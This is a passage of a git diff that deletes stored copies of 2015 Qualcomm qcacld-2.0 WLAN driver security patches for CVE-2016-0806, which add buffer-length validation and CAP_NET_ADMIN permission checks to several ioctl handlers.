-                        VOS_ASSERT(0);
--                       kfree(base_genie);
--                       return -ENOMEM;
-+                       ret = -EINVAL;
-+                       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2349,6 +2350,14 @@ static int iw_set_genie(struct net_device *dev,
-                 else if (0 == memcmp(&genie[0], "\x00\x50\xf2", 3))
-                 {
-                     hddLog (VOS_TRACE_LEVEL_INFO, "%s Set WPA IE (len %d)",__func__, eLen + 2);
-+                    if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+                    {
-+                       hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+                                                      "Need bigger buffer space");
-+                       ret = -EINVAL;
-+                       VOS_ASSERT(0);
-+                       goto exit;
-+                    }
-                     memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                     memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                     pWextState->roamProfile.pWPAReqIE = pWextState->WPARSNIE;
-@@ -2365,8 +2374,8 @@ static int iw_set_genie(struct net_device *dev,
-                        hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-                                                       "Need bigger buffer space");
-                        VOS_ASSERT(0);
--                       kfree(base_genie);
--                       return -ENOMEM;
-+                       ret = -ENOMEM;
-+                       goto exit;
-                     }
-                     // save to Additional IE ; it should be accumulated to handle WPS IE + other IE
-                     memcpy( pWextState->genIE.addIEdata + curGenIELen, genie - 2, eLen + 2);
-@@ -2375,6 +2384,14 @@ static int iw_set_genie(struct net_device *dev,
-               break;
-          case DOT11F_EID_RSN:
-                 hddLog (LOG1, "%s Set RSN IE (len %d)",__func__, eLen+2);
-+                if ((eLen + 2) > (sizeof(pWextState->WPARSNIE)))
-+                {
-+                    hddLog(VOS_TRACE_LEVEL_FATAL, "Cannot accommodate genIE. "
-+                                                  "Need bigger buffer space");
-+                    ret = -EINVAL;
-+                    VOS_ASSERT(0);
-+                    goto exit;
-+                }
-                 memset( pWextState->WPARSNIE, 0, MAX_WPA_RSN_IE_LEN );
-                 memcpy( pWextState->WPARSNIE, genie - 2, (eLen + 2));
-                 pWextState->roamProfile.pRSNReqIE = pWextState->WPARSNIE;
-@@ -2383,15 +2400,15 @@ static int iw_set_genie(struct net_device *dev,
- 
-          default:
-                 hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, elementId);
--            kfree(base_genie);
--            return 0;
-+                goto exit;
-     }
-         genie += eLen;
-         remLen -= eLen;
-     }
-+exit:
-     EXIT();
-     kfree(base_genie);
--    return 0;
-+    return ret;
- }
- 
- static int iw_get_genie(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch
deleted file mode 100644
index dd9724e2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0014.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From f31e58289c8ebded58ffe1d4709e2f878765b0a6 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 17:38:59 -0700
-Subject: qcacld 2.0: Address buffer overflow due to invalid length
-
-prima to qcacld-2.0 propagation
-
-Check for valid length before copying the packet filter data from
-userspace buffer to kernel space buffer to avoid buffer overflow
-issue.
-
-CRs-Fixed: 930533
-Git-commit: a079d716b5481223f0166c644e9ec7c75a31b02c
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 93136df..0b1ee24 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8376,6 +8376,9 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
- 
-                 hddLog(VOS_TRACE_LEVEL_INFO, "Data Offset %d Data Len %d",
-                         pRequest->paramsData[i].dataOffset, pRequest->paramsData[i].dataLength);
-+                if ((sizeof(packetFilterSetReq.paramsData[i].compareData)) <
-+                           (pRequest->paramsData[i].dataLength))
-+                    return -EINVAL;
- 
-                 memcpy(&packetFilterSetReq.paramsData[i].compareData,
-                         pRequest->paramsData[i].compareData, pRequest->paramsData[i].dataLength);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch
deleted file mode 100644
index 45549451..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0015.patch
+++ /dev/null
@@ -1,188 +0,0 @@
-From 255dd931573beb3afca15909f483f26db22a5c98 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 20:58:02 -0700
-Subject: qcacld 2.0: Validate ioctls for valid input length
-
-prima to qcacld-2.0 propagation
-
-Return failure to applications if ioctl is invoked with arguments
-of improper length.
-
-CRs-Fixed: 930542
-Git-commit: 8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- .../qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c     | 62 +++++++++++++++++-----
- 1 file changed, 48 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index 1f56db2..51ee547 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3880,6 +3880,7 @@ static int iw_softap_setwpsie(struct net_device *dev,
-    u_int8_t WPSIeType;
-    u_int16_t length;
-    struct iw_point s_priv_data;
-+   int ret = 0;
- 
-    ENTER();
- 
-@@ -3925,9 +3926,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA:
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe);
--               kfree(fwps_genie);
--               return -EINVAL;
-+                ret = -EINVAL;
-+                goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
-             {
-@@ -3985,6 +3985,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > sizeof(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSBeaconIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_UUIDE_PRESENT;
-                       pos += length;
-@@ -3999,9 +4004,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
- 
-                    default:
-                       hddLog (LOGW, "UNKNOWN TLV in WPS IE(%x)", (*pos<<8 | *(pos+1)));
--                      vos_mem_free(pSap_WPSIe);
--                      kfree(fwps_genie);
--                      return -EINVAL;
-+                      ret = -EINVAL;
-+                      goto exit;
-                 }
-               }
-             }
-@@ -4013,9 +4017,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
- 
-          default:
-             hddLog (LOGE, "%s Set UNKNOWN IE %X",__func__, wps_genie[0]);
--            vos_mem_free(pSap_WPSIe);
--            kfree(fwps_genie);
--            return 0;
-+            ret = -EINVAL;
-+            goto exit;
-       }
-     }
-     else if( wps_genie[0] == eQC_WPS_PROBE_RSP_IE)
-@@ -4027,9 +4030,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
-          case DOT11F_EID_WPA:
-             if (wps_genie[1] < 2 + 4)
-             {
--               vos_mem_free(pSap_WPSIe);
--               kfree(fwps_genie);
--               return -EINVAL;
-+                ret = -EINVAL;
-+                goto exit;
-             }
-             else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0)
-             {
-@@ -4093,6 +4095,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.UUID_E, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_UUIDE_PRESENT;
-                       pos += length;
-@@ -4102,6 +4109,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length >  (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.num_name = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.Manufacture.name, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MANUFACTURE_PRESENT;
-@@ -4112,6 +4124,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelName.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNAME_PRESENT;
-@@ -4121,6 +4138,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.ModelNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_MODELNUMBER_PRESENT;
-@@ -4130,6 +4152,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.SerialNumber.text, pos, length);
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.FieldPresent |= WPS_PROBRSP_SERIALNUMBER_PRESENT;
-@@ -4153,6 +4180,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-                       pos += 2;
-                       length = *pos<<8 | *(pos+1);
-                       pos += 2;
-+                      if (length > (sizeof(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text)))
-+                      {
-+                          ret = -EINVAL;
-+                          goto exit;
-+                      }
-                       pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.num_text = length;
-                       vos_mem_copy(pSap_WPSIe->sapwpsie.sapWPSProbeRspIE.DeviceName.text, pos, length);
-                       pos += length;
-@@ -4189,6 +4221,8 @@ static int iw_softap_setwpsie(struct net_device *dev,
- #else
-     halStatus = WLANSAP_Set_WpsIe(pVosContext, pSap_WPSIe);
- #endif
-+    if (halStatus != eHAL_STATUS_SUCCESS)
-+        ret = -EINVAL;
-     pHostapdState = WLAN_HDD_GET_HOSTAP_STATE_PTR(pHostapdAdapter);
-     if( pHostapdState->bCommit && WPSIeType == eQC_WPS_PROBE_RSP_IE)
-     {
-@@ -4200,11 +4234,11 @@ static int iw_softap_setwpsie(struct net_device *dev,
-         WLANSAP_Update_WpsIe ( pVosContext );
- #endif
-     }
--
-+exit:
-     vos_mem_free(pSap_WPSIe);
-     kfree(fwps_genie);
-     EXIT();
--    return halStatus;
-+    return ret;
- }
- 
- static int iw_softap_stopbss(struct net_device *dev,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch
deleted file mode 100644
index 3ed18cba..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0016.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From d4b451bd06ad53ed785cbda4272c54788b1537d4 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 20:59:45 -0700
-Subject: wlan:Check priviledge permission before processing SET_OEM_DATA_REQ
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930549
-Git-commit: 6feb2faf80a05940618aa2eef2b62e4e2e54f148
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-index dbec0fc..26d0b5f 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -189,6 +189,12 @@ int iw_set_oem_data_req(
-     hdd_adapter_t *pAdapter = (netdev_priv(dev));
-     hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-     {
-        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch
deleted file mode 100644
index a1afccc9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0017.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 2882941530cbf804e280f235f7f8d76179a423fe Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:03:01 -0700
-Subject: wlan:Check priviledge permission before processing  SET_CHAR_GET_NONE
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930935
-Git-commit: 0e53a89bfe0dbb50e0dde9a6960d274386247cd9
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 0b1ee24..88d75c1 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6200,6 +6200,12 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
-         return -EBUSY;
-     }
- 
-+    if (!capable(CAP_NET_ADMIN)){
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     /* helper function to get iwreq_data with compat handling. */
-     if (hdd_priv_get_data(&s_priv_data, wrqu)) {
-        return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch
deleted file mode 100644
index b370fb21..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0018.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 825827ab2aa271f23f48aa683046a3aa3f7fe90e Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:04:10 -0700
-Subject: wlan:Check priviledge permission before processing SET_PACKET_FILTER
- IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930937
-Git-commit: 88ce639e7a0bba852f193b6f53b7ca1926a09b02
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 88d75c1..09d7288 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -8720,6 +8720,12 @@ static int iw_set_packet_filter_params(struct net_device *dev,
-     int ret;
-     struct iw_point s_priv_data;
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     if (hdd_priv_get_data(&s_priv_data, wrqu)) {
-        return -EINVAL;
-     }
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch
deleted file mode 100644
index 39b3431e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0019.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 27d3007a7635ccca7ae9bfb98c89724652dcbc3b Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:05:26 -0700
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930944
-Git-commit: 2905578424256be07e6b9d8c63bb83d40cc52a71
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index 51ee547..77b4124 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3884,6 +3884,12 @@ static int iw_softap_setwpsie(struct net_device *dev,
- 
-    ENTER();
- 
-+   if (!capable(CAP_NET_ADMIN)) {
-+       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                FL("permission check failed"));
-+       return -EPERM;
-+   }
-+
-    /* helper function to get iwreq_data with compat handling. */
-    if (hdd_priv_get_data(&s_priv_data, wrqu)) {
-       return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch
deleted file mode 100644
index d707171c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0020.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 89c3372735486a2f7f6b35298fcf246e7e177ac0 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:06:39 -0700
-Subject: wlan:Check priviledge permission for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-CRs-Fixed: 930946
-Git-commit: be62ecde85228b91c66fb047e27d25132f56bd0d
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-index 77b4124..b95a853 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3243,6 +3243,13 @@ static iw_softap_disassoc_sta(struct net_device *dev,
-     struct tagCsrDelStaParams delStaParams;
- 
-     ENTER();
-+
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     /* iwpriv tool or framework calls this ioctl with
-      * data passed in extra (less than 16 octets);
-      */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch
deleted file mode 100644
index 2da030ed..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0021.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From e2addf5aa2c7dfc537c2b80d8cc1cb5640346535 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:07:47 -0700
-Subject: wlan:Check priviledge permission for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930952
-Git-commit: 6642bccf3ed8cba176dee7d4bbc21fc4580efb7b
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 09d7288..1cbdf32 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9417,6 +9417,12 @@ static int iw_set_band_config(struct net_device *dev,
-         return -EBUSY;
-     }
- 
-+    if (!capable(CAP_NET_ADMIN)) {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                  FL("permission check failed"));
-+        return -EPERM;
-+    }
-+
-     return hdd_setBand(dev, value[0]);
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch
deleted file mode 100644
index 57d4597a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0022.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From e474427496ccb784878e10978f25b6e85de68850 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:10:14 -0700
-Subject: wlan:Check priviledge permission for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930953
-Git-commit: 6665a9697b404acf4d2e7d52d9c2b19512c9b239
-Bug: 25344453
-Signed-off-by: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
----
- drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-index 1cbdf32..841ed4c 100644
---- a/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/qcacld-2.0/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9434,6 +9434,12 @@ static int iw_set_power_params_priv(struct net_device *dev,
-   char *ptr;
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-                 "Set power params Private");
-+
-+  if (!capable(CAP_NET_ADMIN)) {
-+      VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+                 FL("permission check failed"));
-+      return -EPERM;
-+  }
-   /* ODD number is used for set, copy data using copy_from_user */
-   ptr = mem_alloc_copy_from_user_helper(wrqu->data.pointer,
-                                         wrqu->data.length);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch b/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch
deleted file mode 100644
index c3e37212..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/qcacld-2.0/0023.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 967f88782e93809cfb27a60b82a3a069d2a52fc4 Mon Sep 17 00:00:00 2001
-From: Amarnath Hullur Subramanyam <amarnath@codeaurora.org>
-Date: Wed, 28 Oct 2015 21:12:55 -0700
-Subject: wlan:Check priviledge permission for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-CRs-Fixed: 930954
